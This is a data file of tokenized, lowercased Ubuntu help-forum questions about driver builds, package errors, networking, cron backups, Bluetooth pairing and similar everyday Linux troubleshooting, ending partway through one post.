440313	with kernel 3.12.15-031215-generic and vmware workstation 10.0.1 build-1379776 vmware-modconfig -- console -- install-all failed	here is the log stopping vmware services : vmware authentication daemon done vm communication interface socket family done virtual machine communication interface done virtual machine monitor done blocking file system done using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-nlymws/vmmon-only' /usr/bin/make -c /lib/modules/3.12.15-031215-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.12.15-031215-generic' cc [ m ] /tmp/modconfig-nlymws/vmmon-only/linux/driver.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/linux/driverlog.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/linux/hostif.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/apic.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/comport.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/cpuid.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/hashfunc.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/memtrack.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/phystrack.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/task.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/common/vmx86.o cc [ m ] /tmp/modconfig-nlymws/vmmon-only/vmcore/moduleloop.o ld [ m ] /tmp/modconfig-nlymws/vmmon-only/vmmon.o building modules , stage 2 . modpost 1 modules warning : `` mcount '' [ /tmp/modconfig-nlymws/vmmon-only/vmmon.ko ] undefined ! cc /tmp/modconfig-nlymws/vmmon-only/vmmon.mod.o ld [ m ] /tmp/modconfig-nlymws/vmmon-only/vmmon.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.12.15-031215-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-nlymws/vmmon-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-nlymws/vmmon-only' cp -f vmmon.ko ./../vmmon.o make : leaving directory `/tmp/modconfig-nlymws/vmmon-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-nlymws/vmnet-only' /usr/bin/make -c /lib/modules/3.12.15-031215-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.12.15-031215-generic' cc [ m ] /tmp/modconfig-nlymws/vmnet-only/driver.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/hub.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/userif.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/netif.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/bridge.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/filter.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/procfs.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/smac_compat.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/smac.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/vnetevent.o cc [ m ] /tmp/modconfig-nlymws/vmnet-only/vnetuserlistener.o ld [ m ] /tmp/modconfig-nlymws/vmnet-only/vmnet.o building modules , stage 2 . modpost 1 modules warning : `` mcount '' [ /tmp/modconfig-nlymws/vmnet-only/vmnet.ko ] undefined ! cc /tmp/modconfig-nlymws/vmnet-only/vmnet.mod.o ld [ m ] /tmp/modconfig-nlymws/vmnet-only/vmnet.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.12.15-031215-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-nlymws/vmnet-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-nlymws/vmnet-only' cp -f vmnet.ko ./../vmnet.o make : leaving directory `/tmp/modconfig-nlymws/vmnet-only' starting vmware services : virtual machine monitor failed virtual machine communication interface done vm communication interface socket family done blocking file system done virtual ethernet failed vmware authentication daemon done unable to start services /var/log/syslog # # # mar 28 21:22:17 kernel : [ 173.580452 ] vmmon : unknown symbol mcount ( err 0 ) mar 28 21:22:17 kernel : [ 173.590567 ] guest personality initialized and is inactive mar 28 21:22:17 kernel : [ 173.590614 ] vmci host device registered ( name=vmci , major=10 , minor=56 ) mar 28 21:22:17 kernel : [ 173.590616 ] initialized host personality mar 28 21:22:17 kernel : [ 173.603780 ] net : registered protocol family 40 mar 28 21:22:17 kernel : [ 173.647354 ] vmnet : unknown symbol mcount ( err 0 ) mar 28 21:24:59 kernel : [ 335.759663 ] net : unregistered protocol family 40 mar 28 21:25:03 kernel : [ 339.530533 ] vmmon : unknown symbol mcount ( err 0 ) mar 28 21:25:03 kernel : [ 339.537892 ] guest personality initialized and is inactive mar 28 21:25:03 kernel : [ 339.537931 ] vmci host device registered ( name=vmci , major=10 , minor=56 ) mar 28 21:25:03 kernel : [ 339.537932 ] initialized host personality mar 28 21:25:03 kernel : [ 339.552037 ] net : registered protocol family 40 mar 28 21:25:03 kernel : [ 339.598377 ] vmnet : unknown symbol mcount ( err 0 ) mar 28 21:27:59 aptdaemon : info : quitting due to inactivity mar 28 21:27:59 aptdaemon : info : quitting was requested mar 28 21:30:45 kernel : [ 681.570285 ] net : unregistered protocol family 40 mar 28 21:30:49 kernel : [ 685.495775 ] vmmon : unknown symbol mcount ( err 0 ) mar 28 21:30:49 kernel : [ 685.503248 ] guest personality initialized and is inactive mar 28 21:30:49 kernel : [ 685.503287 ] vmci host device registered ( name=vmci , major=10 , minor=56 ) mar 28 21:30:49 kernel : [ 685.503288 ] initialized host personality mar 28 21:30:49 kernel : [ 685.516189 ] net : registered protocol family 40 mar 28 21:30:49 kernel : [ 685.561863 ] vmnet : unknown symbol mcount ( err 0 )
440317	how to fix ftp to self ?	i am able to ftp into my server , but when log on via ssh and do ftp localhost , i receive the message ftp > ftp : connect : connection refused . i think i need it to ftp to itself for wordpress . is this a firewall issue ? how can i diagnose it ?
440319	parse cisco asa config	has anybody come across a utility or devised a procedure to identify redundant objects etc within asa config ( cisco asa 5520 ) or any firewall . i am currently searching via notepad ++ for objects to identify if they are being used . i want it identify duplicate / overlapping access lists , service groups , network object groups , redundant ip names etc . what i am trying to achieve is a nice neat and tight firewall config . any help would be much appreciated . regards , david
440320	setting lang for sublimetext from unity	i am trying to run sublimetext with the package control addon and each time i open it using the unity launcher i receive this error . so far i have tried following the instructions provided by ubuntu community help , setting it in all of the mentioned places and then restarting has not fixed the problem . i 've also followed the steps found on the package control github page to no avail . this does work when i am launching sublimetext from the command line so i am guessing it is a unity specific problem , does anyone know how to set lang correctly when launching sublimetext from unity ? edit : adding installation details , i installed using the 64-bit sublimetext3 .deb found here , http : //c758482.r82.cf2.rackcdn.com/sublime-text_build-3059_amd64.deb package control was installed using the simple method found here , https : //sublime.wbond.net/installation
440321	intel nuc no sound over hdmi terminal commands	i have just installed ubuntu on my intel nuc . i am trying to fix the fact i have no sound over hdmi . i found the supposed fix in the following instructions : **no audio through hdmi ( many flavors of ubuntu ) : this is n't specific to the nuc as it seems to be happening on lots of builds , but it 's easy to get around : make sure your system is up to date using the update manager add the following groups to your account : audio , pulse , pulse-access , video , voice in a terminal window run the following : sudo add-apt-repository ppa : ubuntu-audio-dev/alsa-daily apt update apt install oem-audio-hda-daily-dkms reboot the system** the problem is when i get as far as running `` apt update '' terminal doesnt recongnise the command . has anyone any idea where i am going wrong ?
440325	how to get access to file system directory	i am new to ubuntu . i want to get access of all the folders in file system directory . i can get access to the folders with : sudo chown sadan : users /path/of/folder but still ca n't apply this command to all the folders .
440326	how can i turn off swap permanently ?	swap makes my system all sluggish and turning it off makes everything smoother . i have 3.5 gb of ram . i know how to turn swap off by entering sudo swapoff -a in the terminal , but that 's just for the current session , because after a reboot swap turns itself back on . is there any way to turn swap off permanently ?
440327	crontab not running as root	mysql backup scripts not running as root crontab - help i 'm trying to run a crontab as root but the script is not running successfully . i can see in syslog that the script is executing but it does not finish . mar 28 04:01:01 ubuntumaster cron [ 16812 ] : ( root ) cmd home/wayne/scripts/mysql_backup.sh ) running the script at the command line works great ... here 's the script : myuser= '' root '' # username mypass= '' devan13 '' # password myhost= '' localhost '' # hostname # linux bin paths , change this if it can not be autodetected via which command mysql= '' $ ( which mysql ) '' mysqldump= '' $ ( which mysqldump ) '' chown= '' $ ( which chown ) '' chmod= '' $ ( which chmod ) '' gzip= '' $ ( which gzip ) '' # backup dest directory , change this if you have someother location dest= '' /home/wayne/backup '' # main directory where backup will be stored mbd= '' $ dest/mysql '' # get hostname host= '' $ ( hostname ) '' # get data in dd-mm-yyyy format now= '' $ ( date + '' % d- % m- % y '' ) '' # file to store current backup file file= '' '' # store list of databases dbs= '' '' # do not backup these databases iggy= '' thisdatabaseschema thatdatabase herdata mydata '' [ ! -d $ mbd ] & & mkdir -p $ mbd || : # only root can access it ! $ chown 0.0 -r $ dest $ chmod 0600 $ dest # get all database list first dbs= '' $ ( $ mysql -u $ myuser -h $ myhost -p $ mypass -bse 'show databases ' ) '' for db in $ dbs do skipdb=-1 if [ `` $ iggy '' ! = `` '' ] ; then for i in $ iggy do [ `` $ db '' == `` $ i '' ] & & skipdb=1 || : done fi if [ `` $ skipdb '' == `` -1 '' ] ; then file= '' $ mbd/ $ db. $ host. $ now.gz '' # do all inone job in pipe , # connect to mysql using mysqldump for select mysql database # and pipe it out to gz file in backup dir : ) $ mysqldump -- quick -u $ myuser -h $ myhost -p $ mypass $ db | $ gzip -9 > $ file fi done thanks , wayne
440333	trouble using `` apt-get update ''	i am trying to use the command `` apt-get update '' , but it gives me this error . it 's not the only command that gives errors like these . apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? how can i fix that ?
440338	slapd not installing on ubuntu 13.10	this problem has been bothering me for quite a while . i have spent hours trying to find out what is wrong but i just could not solve it . when i try to do sudo apt-get install slapd with all the other openldap and ldap-utils installed , this is what happens : the following new packages will be installed : slapd 0 upgraded , 1 newly installed , 0 to remove and 4 not upgraded . need to get 0 b/1738 kb of archives . after this operation , 4199 kb of additional disk space will be used . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_sg : en '' , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_sg.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... /usr/bin/locale : can not set lc_ctype to default locale : no such file or directory /usr/bin/locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package slapd . ( reading database ... 174703 files and directories currently installed . ) unpacking slapd ( from ... /slapd_2.4.31-1+nmu2ubuntu3_amd64.deb ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory processing triggers for ufw ... processing triggers for ureadahead ... setting up slapd ( 2.4.31-1+nmu2ubuntu3 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory creating initial configuration ... loading the initial configuration from the ldif file ( ) failed with the following error while running slapadd : 53358740 str2entry : invalid value for attributetype objectclass # 0 ( syntax 1.3.6.1.4.1.1466.115.121.1.38 ) slapadd : could not parse entry ( line=1038 ) dpkg : error processing slapd ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for ufw ... processing triggers for ureadahead ... errors were encountered while processing : slapd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help would be appreciated .
440342	java vulnerabilities	i have an very simple question , when a vulnerability is discovered in java ( which happens regularly ) , is it also affects openjdk ? this is a question i ask myself without managing to find the answer !
440344	update-grub always removing windows efi entry	my laptop ( vaio svs1312c5e ) always seems to start the microsoft/ ... entry in the efi partition if it exists . i can make ubuntu boot by mounting the efi partition and renaming the microsoft/ folder to something else . if renamed to something else , then update-grub will not find the os and always remove the entry for windows from the boot list . if i let grub-update run when microsoft/ is present , it will correctly detect it and create an entry for it . i can then manually edit grub.cfg to point to the renamed folder e.g . micros and then rename microsoft to micros to get it working . however : update-grub is always run by ubuntu after a kernel has been added/removed . therefore update-grub is regularly removing that entry , leaving my unable to boot to windows . what can i do to prevent this from happening ? thanks a lot .
440345	why `dpkg -l | grep package` is showing a package after being purged	to uninstall a package ( ex : tor ) installed from repository one should use sudo apt-get remove tor i did this but dpkg -l | grep tor shown something against the package . next i try sudo apt-get purge tor but when i check dpkg -l | grep tor i got , reza @ reza-n43jm : / $ dpkg -l tor desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un tor < none > ( no description available ) i think when i uninstall any package i should not get anything in dpkg -l list . is it true ? or apt-get remove or purge does another work but not uninstall ?
440347	unknown internet traffic	my internet device ( a usb dongle ) shows internet speed very good . but actually , when i browse and surf websites , they all seem to load very slow . even if none of sites are loading , all stopped , the device will still show much high download and upload speeds . it seems there 's always something hidden traffic running on the background which i ca n't see . what it could be ? how can i know every single program using my internet bandwidth ? is there any program for it ?
440351	where does samba store its passwords ?	i 'm trying to make a program that will store the passwords with users input ( a web app ) , rather than having to do it from the command line . the problem is that i do n't know where the passwords are being stored as to change then .
440353	how to set up unikey the same way as vpskeys in windows	i am trying to switch a laptop to ubuntu for a family member . currently the laptop runs windows and a program called vpskeys , which is used to add vietnamese accents and other characters when using a us keyboard . i have found unikey on gnu/linux could be a replacement for it , but the documentation is written in vietnamese , and since i do not understand how vpskeys work , or read vietnamese , i ca n't think of a way to replicate the same functionality . my question is : has anyone used unikey . does it behave the same way as vpskeys on windows ? are there tweaks required to get it to behave the same way ? the unikey site is located at : https : //code.google.com/p/ibus-unikey/ more info on vps keys : http : //en.wikipedia.org/wiki/vpskeys thank you ,
440354	how to make a home network with ubuntu and windows xp	i have a main computer running ubuntu connected to the internet with wlan . i have another computer with windows xp that i do n't want to connect directly to the internet . but i would like to wired those computers together using a crosswired connection in a home network . i have n't done such things in a very long time and need help , both sides ( ubuntu and windows ) .
440356	wine not working	i am trying to run/install an exe file with wine . when i try to install using `` open with wine windows program loader '' nothing happens . when i try in terminal ( i.e. , wine filename.exe ) i get the following output . any advice ? thanks ! fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : ole : coinitializesecurity ( ( nil ) , -1 , ( nil ) , ( nil ) ,0,3 , ( nil ) ,0 , ( nil ) ) - stub !
440357	virtualbox hangs when shutting down after having installed guest editions	i have had a few ubuntu 12.04 lts vms running on my windows 7 host and it 's been great . i just recently added the guest additions to one of the ubuntu guests on virtual box and now every time i try to shutdown windows tells me that the virtual box has stopped working . what do i need to do to solve the problem and keep my guest additions ?
440358	64-bit or 32-bit for intel i7 ?	i have 13.10 on disc , and it 's the 64-bit version . i recently tried to upgrade to 14.04 and noticed the 64-bit version was amd only . the main website makes no distinction that i recall for 13.10 . what 's going on ?
440360	warzone fullscreen setting problem	i changed the settings in warzone 2100 from windowed mode to full screen and now when i try to run warzone 2100 it will not run . how can i change the settings out side of the game to fix this problem . im using ubuntu 13.10 .
440362	netbeans and codelite do not recognize # include < iostream > c++	i recently decided try learn a bit of programming , so i wrote my `` hello world '' and it did not work . this is my code # include < iostream > using namespace std ; int main ( ) { cout < < `` hello world ! `` ; return0 ; } i have also tried to reinstall g++ and using # include < iostream.h > . all these exclamation marks say basicly the same : unable to resolve identifier ( cout etc. ) . the one at the top says : can not find include file iostream
440369	apache is not starting after i upgraded to 13.10	yesterday i upgraded to 13.10 , but aphache server fails to restart . when i enter sudo service apache2 restart i get following error : sudo service apache2 restart * restarting web server apache2 [ fail ] * the apache2 configtest failed . output of config test was : apache2 : syntax error on line 265 of /etc/apache2/apache2.conf : can not load /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.21/buildout/apache2/mod_passenger.so into server : /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.21/buildout/apache2/mod_passenger.so : undefined symbol : unixd_config action 'configtest ' failed . the apache error log may have more information . how can i fix that ?
440370	unsuccessful installation	there 's a problem while installing ubuntu 12.04 lts via usb . i have done all the processes correctly ... when i reboot system and select the usb startup , the ubantu starts and asks for `` try or install '' that 's fine up to this.. when i click on try and then go for `` install '' icon on desktop , it works until the install type is selected.. i selected the `` install alongside windows 7 '' option ( that appears first ) . when i do that , the system automatically restarts and loads the windows 7 startup ... what to do ... ubuntu does not install.. tried 27 times > > but failed ... every time same thing happens .
440371	ca n't open software-center and software & updates	this is the error i 'm getting traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 373 , in __init__ self.cache , self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/globalpane.py '' , line 32 , in __init__ self.back_forward.set_valign ( gtk.align.center ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 313 , in __getattr__ return getattr ( self._introspection_module , name ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 165 , in __getattr__ setattr ( wrapper , value_name , wrapper ( value_info.get_value ( ) ) ) valueerror : invalid enum value : 4
440372	is execution stopped after an error ?	when running a shell script , suppose an error occurs at one line . are the other lines executed or does the execution of the script stop ? i have a script i want to execute with many commands over the week end and i want to make sure if an error occurs at a line , the other lines are executed .
440375	problem with g++	i want to install g++ but i ca n't do it . i tried installing it from software center and terminal using apt-get install g++ but it wo n't work . i 'm getting the following error : the following packages have unmet dependencies : g++ : depends g++-4.8 ( > = 4.8.1-4~ ) but it is not going to be installed . any help appreciated .
440380	network manager does not find my modem	all worked okay , but today i have installed mobile partner . after i have uninstalled it . and now the modem manager does n't find my modem . i have connected the internet with sakis3g . what i can do now to solve the problem ? i 'm using ubuntu gnome 12.04 .
440382	how to install ubuntu 12.04 with nvidia gtx 660	i 'm installing ubuntu but i keep getting a black terminal like screen i believe it is because of my graphics card . any thoughts ?
440383	how do i route an openvpn connection to an interface ?	i want a service on my server to connect to the internet using an openvpn connection . while i could connect the server to the openvpn server directly , it would ( a ) make the rest of the server connect using the connection , and ( b ) make my server inaccessible because the ports are closed . is there simple tutorial on how to do this for those that are n't deep into networking and routing like myself ? i imagine the way to do this is to create an interface for the connection , connect the openvpn client to it , and bind the service ( s ) i want to that specific interface . but i have no idea where to start .
440386	bluetoothd ( bluez 5 ) wo n't connect with any devices	solved . edited : see below . i think i 've scoured the internet long enough for this issue . it has been asked many times , but none of the solutions work for me . i upgraded to bluez 5 because i want to be able to use its low energy capabilities eventually . right now , though , i ca n't get even get my devices paired . i ca n't use a gui because this will eventually be for an embedded linux system . therefore , i think i also ca n't use bluetoothctl , because it requires an interactive session . ( i may be wrong on that . ) so i want everything to be either through bash , c , or python , in that order . also , because it needs to be automated , the pairing and connection will have to be initiated from the bluetooth device , not from the linux box . lastly , all devices need to use the a2dp profile . there seem to be many approaches , but i am not clear on where one ends and the other begins : approach 1 : a ) $ sudo bluetoothd -d -n # runs bluetoothd in verbose mode b ) $ hciconfig hci1 up # turns the device on $ hciconfig -a # see device properties type : br/edr bus : usb bd address : 00:02:72 : c5 : d8 : e0 acl mtu : 1021:8 sco mtu : 64:1 up running pscan iscan rx bytes:32875 acl:761 sco:0 events:1037 errors:0 tx bytes:20178 acl:780 sco:0 commands:329 errors:0 features : 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : rswitch sniff link mode : slave accept name : 'adapter-1' class : 0x00010c service classes : unspecified device class : computer , laptop hci version : 4.0 ( 0x6 ) revision : 0x1000 lmp version : 4.0 ( 0x6 ) subversion : 0x220e manufacturer : broadcom corporation ( 15 ) c ) try to pair from the device . result : from bluetoothd : bluetoothd [ 5359 ] : src/adapter.c : connected_callback ( ) hci1 device 70:72:3c:62:49:7f connected eir_len 15 bluetoothd [ 5359 ] : src/adapter.c : user_confirm_request_callback ( ) hci1 70:72:3c:62:49:7f confirm_hint 1 bluetoothd [ 5359 ] : src/device.c : new_auth ( ) requesting agent authentication for 70:72:3c:62:49:7f ** bluetoothd [ 5359 ] : no agent available for request type 2 ** bluetoothd [ 5359 ] : device_confirm_passkey : operation not permitted bluetoothd [ 5359 ] : src/adapter.c : btd_adapter_confirm_reply ( ) hci1 addr 70:72:3c:62:49:7f success 0 bluetoothd [ 5359 ] : src/adapter.c : bonding_attempt_complete ( ) hci1 bdaddr 70:72:3c:62:49:7f type 0 status 0x5 bluetoothd [ 5359 ] : src/device.c : device_bonding_complete ( ) bonding ( nil ) status 0x05 bluetoothd [ 5359 ] : src/device.c : device_bonding_failed ( ) status 5 bluetoothd [ 5359 ] : src/adapter.c : resume_discovery ( ) bluetoothd [ 5359 ] : src/adapter.c : dev_disconnected ( ) device 70:72:3c:62:49:7f disconnected , reason 3 bluetoothd [ 5359 ] : src/adapter.c : adapter_remove_connection ( ) bluetoothd [ 5359 ] : src/adapter.c : bonding_attempt_complete ( ) hci1 bdaddr 70:72:3c:62:49:7f type 0 status 0xe bluetoothd [ 5359 ] : src/device.c : device_bonding_complete ( ) bonding ( nil ) status 0x0e bluetoothd [ 5359 ] : src/device.c : device_bonding_failed ( ) status 14 bluetoothd [ 5359 ] : src/adapter.c : resume_discovery ( ) device says could n't pair with adapter-1 because of an incorrect pin or passkey . based on the starred responses above , i looked into why there was n't an agent . what 's an agent ? who knows , but i inferred that it was the middleman between my device and the bluetooth daemon . d ) $ ../bluey-5.15/test/simple-agent # i also tried using sudo with these commands or $ ../bluey-5.15/test/simple-agent hci1 this is a python script that handles incoming pairing requests . if successful , it also tries to 'trust ' and 'connect' output : agent registered e ) then i try again to pair from the device . simple-agent output : requestconfirmation ( /org/bluez/hci1/dev_70_72_3c_62_49_7f , 110643 ) confirm passkey ( yes/no ) : yes i hit pair on the bt device and it says paired , but simple-agent hangs . i have used bluez 4 , and i am pretty sure it 's supposed to say something like `` new device xx_xx_xx_xx_xx_xx '' bluetoothd output : ** bluetoothd [ 5359 ] : src/agent.c : set_default_agent ( ) default agent set to :1.126 /test/agent bluetoothd [ 5359 ] : src/adapter.c : connected_callback ( ) hci1 device 70:72:3c:62:49:7f connected eir_len 15 bluetoothd [ 5359 ] : src/adapter.c : user_confirm_request_callback ( ) hci1 70:72:3c:62:49:7f confirm_hint 0 bluetoothd [ 5359 ] : src/device.c : new_auth ( ) requesting agent authentication for 70:72:3c:62:49:7f bluetoothd [ 5359 ] : src/agent.c : agent_ref ( ) 0xa59290 : ref=2 bluetoothd [ 5359 ] : src/agent.c : agent_request_confirmation ( ) calling agent.requestconfirmation : name=:1.126 , path=/test/agent , passkey=110643 bluetoothd [ 5359 ] : src/agent.c : agent_ref ( ) 0xa59290 : ref=3 bluetoothd [ 5359 ] : src/adapter.c : btd_adapter_confirm_reply ( ) hci1 addr 70:72:3c:62:49:7f success 1 bluetoothd [ 5359 ] : src/agent.c : agent_unref ( ) 0xa59290 : ref=2 bluetoothd [ 5359 ] : src/agent.c : agent_unref ( ) 0xa59290 : ref=1 bluetoothd [ 5359 ] : src/adapter.c : new_link_key_callback ( ) hci1 new key for 70:72:3c:62:49:7f type 5 pin_len 0 bluetoothd [ 5359 ] : src/device.c : device_set_bonded ( ) bluetoothd [ 5359 ] : src/device.c : device_bonding_complete ( ) bonding ( nil ) status 0x00 bluetoothd [ 5359 ] : src/adapter.c : resume_discovery ( ) bluetoothd [ 5359 ] : src/adapter.c : dev_disconnected ( ) device 70:72:3c:62:49:7f disconnected , reason 3 bluetoothd [ 5359 ] : src/adapter.c : adapter_remove_connection ( ) bluetoothd [ 5359 ] : src/adapter.c : bonding_attempt_complete ( ) hci1 bdaddr 70:72:3c:62:49:7f type 0 status 0xe bluetoothd [ 5359 ] : src/device.c : device_bonding_complete ( ) bonding ( nil ) status 0x0e bluetoothd [ 5359 ] : src/device.c : device_bonding_failed ( ) status 14 bluetoothd [ 5359 ] : src/adapter.c : resume_discovery ( ) so this does something . hcidump output : $ hcidump -i hci1 hci sniffer - bluetooth packet analyzer ver 5.15 device : hci1 snap_len : 1500 filter : 0xffffffffffffffff > hci event : connect request ( 0x04 ) plen 10 bdaddr 70:72:3c:62:49:7f class 0x5a020c type acl > hci event : command status ( 0x0f ) plen 4 accept connection request ( 0x01|0x0009 ) status 0x00 ncmd 1 > hci event : connect complete ( 0x03 ) plen 11 status 0x00 handle 11 bdaddr 70:72:3c:62:49:7f type acl encrypt 0x00 > hci event : command status ( 0x0f ) plen 4 read remote supported features ( 0x01|0x001b ) status 0x00 ncmd 1 > hci event : read remote supported features ( 0x0b ) plen 11 status 0x00 handle 11 features : 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 > hci event : command status ( 0x0f ) plen 4 read remote extended features ( 0x01|0x001c ) status 0x00 ncmd 1 > hci event : command complete ( 0x0e ) plen 10 io capability request reply ( 0x01|0x002b ) ncmd 1 status 0x00 bdaddr 70:72:3c:62:49:7f > hci event : read remote extended features ( 0x23 ) plen 13 status 0x00 handle 11 page 1 max 1 features : 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 > hci event : command status ( 0x0f ) plen 4 remote name request ( 0x01|0x0019 ) status 0x00 ncmd 1 > hci event : remote name req complete ( 0x07 ) plen 255 status 0x00 bdaddr 70:72:3c:62:49:7f name 'prism ii' > hci event : command complete ( 0x0e ) plen 10 user confirmation request reply ( 0x01|0x002c ) ncmd 1 status 0x00 bdaddr 70:72:3c:62:49:7f > hci event : disconn complete ( 0x05 ) plen 4 status 0x00 handle 11 reason 0x13 reason : remote user terminated connection i even tried bluetoothctl , but it has the same results . the funny thing is that some scripts from bluez ( like test-device ) can see the bt device for some commands , but not others . for instance , test-device will 'trust ' the device , but when i try to 'remove ' it , it does n't exist . approach 2 : dbus directly using the dbus-send -- system commands . i do n't think any of these commands will do me any good until i can pair and connect the device . approach 3 : i tried all of the suggestions on this post . there is no /etc/bluetooth/hcid.conf in bluez 5 . do i need to create one ? the rfcomm command will connect , but then disconnect right after . $ sudo rfcomm connect /dev/rfcomm0 70:72:3c:62:49:7f 1 connected /dev/rfcomm0 to 70:72:3c:62:49:7f on channel 1 press ctrl-c for hangup disconnected bluetoothd output : bluetoothd [ 5359 ] : src/adapter.c : connected_callback ( ) hci1 device 70:72:3c:62:49:7f connected eir_len 10 bluetoothd [ 5359 ] : src/adapter.c : dev_disconnected ( ) device 70:72:3c:62:49:7f disconnected , reason 3 bluetoothd [ 5359 ] : src/adapter.c : adapter_remove_connection ( ) bluetoothd [ 5359 ] : src/adapter.c : bonding_attempt_complete ( ) hci1 bdaddr 70:72:3c:62:49:7f type 0 status 0xe bluetoothd [ 5359 ] : src/device.c : device_bonding_complete ( ) bonding ( nil ) status 0x0e bluetoothd [ 5359 ] : src/device.c : device_bonding_failed ( ) status 14 bluetoothd [ 5359 ] : src/adapter.c : resume_discovery ( ) hcidump output : $ hcidump -i hci1 hci sniffer - bluetooth packet analyzer ver 5.15 device : hci1 snap_len : 1500 filter : 0xffffffffffffffff > hci event : command status ( 0x0f ) plen 4 create connection ( 0x01|0x0005 ) status 0x00 ncmd 1 > hci event : connect complete ( 0x03 ) plen 11 status 0x00 handle 11 bdaddr 70:72:3c:62:49:7f type acl encrypt 0x00 > hci event : command status ( 0x0f ) plen 4 read remote supported features ( 0x01|0x001b ) status 0x00 ncmd 1 > hci event : read remote supported features ( 0x0b ) plen 11 status 0x00 handle 11 features : 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 > hci event : command status ( 0x0f ) plen 4 read remote extended features ( 0x01|0x001c ) status 0x00 ncmd 1 > hci event : read remote extended features ( 0x23 ) plen 13 status 0x00 handle 11 page 1 max 1 features : 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 > hci event : command status ( 0x0f ) plen 4 remote name request ( 0x01|0x0019 ) status 0x00 ncmd 1 > hci event : remote name req complete ( 0x07 ) plen 255 status 0x00 bdaddr 70:72:3c:62:49:7f name 'prism ii' > hci event : command status ( 0x0f ) plen 4 authentication requested ( 0x01|0x0011 ) status 0x00 ncmd 1 > hci event : command complete ( 0x0e ) plen 10 link key request reply ( 0x01|0x000b ) ncmd 1 status 0x00 bdaddr 70:72:3c:62:49:7f > hci event : auth complete ( 0x06 ) plen 3 status 0x00 handle 11 > hci event : command status ( 0x0f ) plen 4 set connection encryption ( 0x01|0x0013 ) status 0x00 ncmd 1 > hci event : encrypt change ( 0x08 ) plen 4 status 0x00 handle 11 encrypt 0x01 > hci event : command status ( 0x0f ) plen 4 exit sniff mode ( 0x02|0x0004 ) status 0x0c ncmd 1 error : command disallowed > hci event : disconn complete ( 0x05 ) plen 4 status 0x00 handle 11 reason 0x13 reason : remote user terminated connection any suggestions ? am i : forgetting something really obvious ? using the tools incorrectly ? forgetting to set a config file ? edit : since the bluez simple-agent was n't giving me any useful errors , i wrote my own pairing agent . once i did , i was able to pair but not connect . bluetoothd gave me this new error : bluetoothd [ 3078 ] : profiles/audio/a2dp.c : a2dp_source_connect ( ) path /org/bluez/hci0/dev_70_72_3c_62_49_7f bluetoothd [ 3078 ] : a2dp-source profile connect failed for 70:72:3c:62:49:7f : protocol not available this post pointed out that maybe my local 